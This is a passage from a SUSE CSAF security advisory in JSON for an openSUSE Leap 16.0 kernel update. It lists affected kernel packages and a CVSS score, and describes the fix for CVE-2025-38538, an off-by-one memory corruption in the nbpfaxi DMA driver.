"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38537"
},
{
"cve": "CVE-2025-38538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38538"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: nbpfaxi: Fix memory corruption in probe()\n\nThe nbpf-\u003echan[] array is allocated earlier in the nbpf_probe() function\nand it has \"num_channels\" elements. These three loops iterate one\nelement farther than they should and corrupt memory.\n\nThe changes to the second loop are more involved. In this case, we\u0027re\ncopying data from the irqbuf[] array into the nbpf-\u003echan[] array. If\nthe data in irqbuf[i] is the error IRQ then we skip it, so the iterators\nare not in sync. I added a check to ensure that we don\u0027t go beyond the\nend of the irqbuf[] array. I\u0027m pretty sure this can\u0027t happen, but it\nseemed harmless to add a check.\n\nOn the other hand, after the loop has ended there is a check to ensure\nthat the \"chan\" iterator is where we expect it to be. In the original\ncode we went one element beyond the end of the array so the iterator\nwasn\u0027t in the correct place and it would always return -EINVAL. However,\nnow it will always be in the correct place. I deleted the check since\nwe know the result.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38538",
"url": "https://www.suse.com/security/cve/CVE-2025-38538"
},
{
"category": "external",
"summary": "SUSE Bug 1248213 for CVE-2025-38538",
"url": "https://bugzilla.suse.com/1248213"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
